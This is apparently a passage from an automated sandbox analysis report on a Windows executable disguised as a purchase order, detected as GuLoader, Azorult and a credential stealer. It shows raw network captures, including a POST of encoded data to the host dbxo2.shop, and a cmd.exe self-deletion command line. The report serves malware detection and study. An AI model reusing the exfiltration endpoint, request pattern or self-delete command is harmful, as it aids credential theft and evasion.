Nov 28, 2022 16:37:03.671912909 CET	189	IN	Data Raw: a3 b6 55 cc bc 20 9f 68 2f 0e 49 14 eb 32 1f c9 17 52 6f 4c e3 e7 4d c7 93 03 94 cd 02 d6 64 73 55 2d c9 21 9c 03 9c fb b2 da 56 11 54 a4 fb 39 98 01 c8 cf 35 47 64 33 36 9e d8 00 8f 04 9e 9e 37 5c 75 6c 32 ce b8 58 f7 6c fa bf 5c 3a 57 76 55 a1 Data Ascii: U h/I2RoLMdsU-!VT95Gd367\ul2Xl\:WvU34T5W3bo}a@;EBmG=T/0G~+_mDoc'dv031+s0]`cN2knd~`lMx:WWmcj2SgVyJ<>UocT=5
Nov 28, 2022 16:37:03.671966076 CET	190	IN	Data Raw: f4 c4 90 91 d9 c5 c7 1a 52 c9 00 80 03 59 e9 1d 12 a6 e1 dd ab 0e 2e aa 98 16 d0 d1 a5 76 2b 14 c4 86 e2 b6 ff 16 d0 58 3a d2 0c 6c ea 2a b1 bd 5d fb 75 51 a3 79 8b 65 f5 f4 40 ef 2c 5d b5 32 33 be 28 42 39 75 e1 00 9e ca 33 55 c5 e4 64 d5 fb b2 Data Ascii: RY.v+X:l*]uQye@,]23(B9u3Udt5W3{@5Ubg65Uccb.Zbpa9G^6#1hV7c-{ V!7_ue$20bcv:6RT/gKRV0cUU6Udy`f
Nov 28, 2022 16:37:03.672019005 CET	191	IN	Data Raw: b9 72 6c 3f 1a a8 27 cf 90 ef 1d d9 06 18 74 c0 db fd 90 c5 38 d8 7d 40 38 1c 11 b0 e0 e8 1e 20 27 c4 75 61 dd df 0c 4b 60 f3 ab f6 2a 28 c6 57 10 48 39 23 86 b5 df 2e f1 35 56 d2 00 d4 0c ef 28 0c a1 56 fd 7a 0e 1e 03 9b f3 79 67 ac ca 30 9f a1 Data Ascii: rl?'t8}@8 'uaK`*(WH9#.5V(Vzyg0dg6)7UQp3.Re3x&{7l/De/BiGwT)2PgR4`Tf020{ia25W3{v2UVze!BrY?Q<[?P`e042x/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49832	104.21.2.6	80	C:\Users\user\Desktop\PO No. 3200005919.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2022 16:37:15.911338091 CET	4784	OUT	POST /dbx2/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo2.shop Content-Length: 23000 Cache-Control: no-cache
Nov 28, 2022 16:37:15.911377907 CET	4785	OUT	Data Raw: 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&fp2p3pFp3)j;l"&g&f&f&gF;f'q<f)&f&fp5p7p;p0p6p2)q!v'&fp3)0e&f&fBg64.b;4g0x4.a66:l
Nov 28, 2022 16:37:15.911427975 CET	4787	OUT	Data Raw: ff 51 01 f4 4e 14 f9 49 06 fc 50 1c fe 4d 02 fc 4a 14 eb 44 1b fe 5a 03 e2 50 19 e7 4a 05 e4 50 0f ea 46 07 e4 4c 17 f4 4c 0d e3 57 17 e5 5a 1b fe 4b 11 fc 42 11 e5 42 05 fb 45 1b f4 45 14 f4 4f 14 ef 52 19 e6 4b 10 eb 4f 0d f8 50 12 ff 4a 04 ed Data Ascii: QNIPMJDZPJPFLLWZKBBEEORKOPJR@EQFNULLGER@[QBZV@MYIZDTDGVQQTPSIGOUEFWMIPBHKUPBZRAGS
Nov 28, 2022 16:37:15.911478043 CET	4795	OUT	Data Raw: 00 e9 47 14 e6 57 02 e5 59 17 f7 4a 03 ff 51 07 f7 51 1e fc 42 00 fa 52 04 e2 4a 00 e6 47 02 e8 48 0c ea 56 03 e0 44 17 e3 46 0f fb 57 14 e8 57 01 e5 5a 19 ff 4f 1f e4 57 10 f8 4c 19 f6 55 0d ec 49 14 fa 51 0f e4 51 01 e1 4a 06 fb 45 19 e1 4f 0f Data Ascii: GWYJQQBRJGHVDFWWZOWLUIQQJEOJVS[M@LDZLJNNWTJLFIPPHQUHAHEVQPVADSRWKREZYGQ@AJLLONQUL
Nov 28, 2022 16:37:15.932391882 CET	4799	OUT	Data Raw: 55 06 e0 41 1f ec 51 01 e0 55 0d e6 55 1e e7 50 1f fc 53 11 f7 52 17 e5 4c 0d f7 44 1a fa 52 0d e1 49 1e e0 44 06 e1 50 13 fa 45 06 e7 55 1b fe 45 1a ef 5a 19 e7 51 17 fd 42 07 eb 45 02 ff 53 19 e1 4d 0c fe 56 17 e6 49 05 e8 44 07 e8 45 05 f6 42 Data Ascii: UAQUUPSRLDRIDPEUEZQBESMVIDEBFZLNKRF@QKHR@OYY@ZHBGAVJRSSSIDJLR@B[IYZMTVJK_HVUUURUQ
Nov 28, 2022 16:37:15.932492971 CET	4807	OUT	Data Raw: 4d 16 e0 49 1a fc 59 00 eb 54 07 ec 45 11 ef 41 18 e9 42 02 eb 55 16 fd 4e 07 e0 53 1c fb 42 07 f4 46 12 e4 4f 13 ed 5b 01 e4 4b 18 fa 5b 06 ea 59 04 fa 47 1f ff 40 04 fa 4c 14 fa 50 07 e8 4a 12 e3 45 06 ff 51 18 fc 49 10 ed 4a 19 f4 56 12 e0 50 Data Ascii: MIYTEABUNSBFO[K[YG@LPJEQIJVPUDKJMRRUWSSFQUPPHDDWMEUHIALBGLNMLKNUPVFBFH[[[AYFWGIDT
Nov 28, 2022 16:37:16.141227961 CET	4808	IN	HTTP/1.1 200 OK Date: Mon, 28 Nov 2022 15:37:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: User-Agent CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XgjHXZ9xUtOsLy8drbcPt8kEU%2BoPPN22BRTaZS7jcG%2Bxi9V3q7hecWgHhvQVGYwK3pTWroBdtXmtjgQiOv1Vmt94zw8vO92Bo1T%2F9dTI8rUbCvl1gsz7Mwb5fJax"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 77142f128b30b8de-AMS alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a Data Ascii: 7falseOK
Nov 28, 2022 16:37:16.141293049 CET	4808	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO No. 3200005919.exePID: 6564, Parent PID: 4652

General

Target ID:	1
Start time:	16:36:12
Start date:	28/11/2022
Path:	C:\Users\user\Desktop\PO No. 3200005919.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO No. 3200005919.exe
Imagebase:	0x400000
File size:	373461 bytes
MD5 hash:	9453CDCF8221341D06BAC47B8AB3AA19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: PO No. 3200005919.exePID: 5920, Parent PID: 6564

General

Target ID:	5
Start time:	16:36:42
Start date:	28/11/2022
Path:	C:\Users\user\Desktop\PO No. 3200005919.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO No. 3200005919.exe
Imagebase:	0x400000
File size:	373461 bytes
MD5 hash:	9453CDCF8221341D06BAC47B8AB3AA19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exePID: 3152, Parent PID: 5920

General

Target ID:	6
Start time:	16:37:16
Start date:	28/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
Imagebase:	0x5f0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exePID: 3384, Parent PID: 3152

General

Target ID:	7
Start time:	16:37:16
Start date:	28/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6e2e30000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exePID: 580, Parent PID: 3152

General

Target ID:	8
Start time:	16:37:17
Start date:	28/11/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\timeout.exe 3
Imagebase:	0x880000
File size:	25088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate